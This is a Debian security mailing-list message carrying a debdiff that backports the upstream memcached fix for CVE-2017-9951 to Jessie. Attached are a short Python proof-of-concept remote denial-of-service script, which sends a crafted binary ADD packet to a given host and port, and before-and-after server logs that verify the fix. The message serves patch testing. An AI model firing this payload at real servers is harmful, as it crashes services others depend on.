On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote: > > Please adjust the affected versions in the BTS as needed.
Please find attached the debdiff for Debian 8 Jessie. Also, you can find a little test case (and results) without (CVE-2017-9951_exploit.log) and with the fix (CVE-2017-9951_fixed.log). I've build and test it on a clean jessie schroot. > > Regards, > Salvatore > -- Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog --- memcached-1.4.21/debian/changelog 2016-11-01 21:10:45.000000000 +0000 +++ memcached-1.4.21/debian/changelog 2017-07-24 20:07:10.000000000 +0000 @@ -1,3 +1,11 @@ +memcached (1.4.21-1.1+deb8u2) unstable; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix CVE-2017-9951 by checking the integer length of commands that adds or + replaces key/value pair + + -- Guillaume Delacour <g...@iroqwa.org> Mon, 24 Jul 2017 19:54:18 +0000 + memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high * Non-maintainer upload by the Security Team. diff -Nru memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch --- memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 1970-01-01 00:00:00.000000000 +0000 +++ memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 2017-07-24 19:59:20.000000000 +0000 @@ -0,0 +1,37 @@ +From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Tue, 4 Jul 2017 00:32:39 -0700 +Subject: [PATCH] sanity check +Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167 + +--- + items.c | 2 ++ + memcached.c | 2 +- + 2 files changed, 3 insertions(+), 1 deletion(-) + +diff --git a/items.c b/items.c +index 637e5e745..83a2ea37d 100644 +--- a/items.c ++++ b/items.c +@@ -368,6 +368,8 @@ void item_free(item *it) { + bool item_size_ok(const size_t nkey, const int flags, const int nbytes) { + char prefix[40]; + uint8_t nsuffix; ++ if (nbytes < 2) ++ return false; + + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, + prefix, &nsuffix); +diff --git a/memcached.c b/memcached.c +index 0f0335795..a89df965d 100644 +--- a/memcached.c ++++ b/memcached.c +@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) { + + case conn_swallow: + /* we are reading sbytes and throwing them away */ +- if (c->sbytes == 0) { ++ if (c->sbytes <= 0) { + conn_set_state(c, conn_new_cmd); + break; + } diff -Nru memcached-1.4.21/debian/patches/series memcached-1.4.21/debian/patches/series --- memcached-1.4.21/debian/patches/series 2016-11-01 21:10:45.000000000 +0000 +++ memcached-1.4.21/debian/patches/series 2017-07-24 20:07:26.000000000 +0000 @@ -5,3 +5,4 @@ 06_eol_comment_handling.patch 07_disable_tests.patch 08_CVE-2016-8704_CVE-2016-8705_CVE-2016-8706.patch +09_CVE-2017-9951.patch
#!/usr/bin/python # thanks https://packetstormsecurity.com/files/121445/killthebox.py.txt && # https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/ import sys import socket print "Memcached Remote DoS" if len(sys.argv) != 3: print "Usage: %s <host> <port>" %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print "[+] Target Host: %s" %(target) print "[+] Target Port: %s" %(port) kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff""" kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""" kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0x{}""".format("41"*1000) hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print "[+] Connected, firing payload!" except: print "[-] Connection Failed... Is there even a target?" sys.exit(1) try: hax.send(kill) print "[+] Payload Sent!" except: print "[-] Payload Sending Failure... WTF?" sys.exit(1) hax.close() print "[*] Should be dead..."
<26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data: <26 0x80 0x12 0x00 0x01 <26 0x08 0x00 0x00 0x00 <26 0xff 0xff 0xff 0xe8 <26 0x00 0x00 0x00 0x00 <26 0x00 0x00 0x00 0x00 <26 0x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26 0x00 0x00 0x00 0x82 >26 0x00 0x00 0x00 0x1d >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 26: going from conn_nread to conn_mwrite 26: going from conn_mwrite to conn_swallow 26: going from conn_swallow to conn_new_cmd 26: going from conn_new_cmd to conn_parse_cmd <26 Read binary protocol data: <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 Invalid magic: 34 26: going from conn_parse_cmd to conn_closing <26 connection closed. 26: going from conn_closing to conn_closed
<26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data: <26 0x80 0x12 0x00 0x01 <26 0x08 0x00 0x00 0x00 <26 0xff 0xff 0xff 0xe8 <26 0x00 0x00 0x00 0x00 <26 0x00 0x00 0x00 0x00 <26 0x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Too large. >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26 0x00 0x00 0x00 0x03 >26 0x00 0x00 0x00 0x0a >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 >26 0x00 0x00 0x00 0x00 26: going from conn_nread to conn_mwrite 26: going from conn_mwrite to conn_swallow 26: going from conn_swallow to conn_new_cmd 26: going from conn_new_cmd to conn_parse_cmd <26 Read binary protocol data: <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 <26 0x34 0x31 0x34 0x31 Invalid magic: 34 26: going from conn_parse_cmd to conn_closing <26 connection closed. 26: going from conn_closing to conn_closed
signature.asc
Description: Digital signature
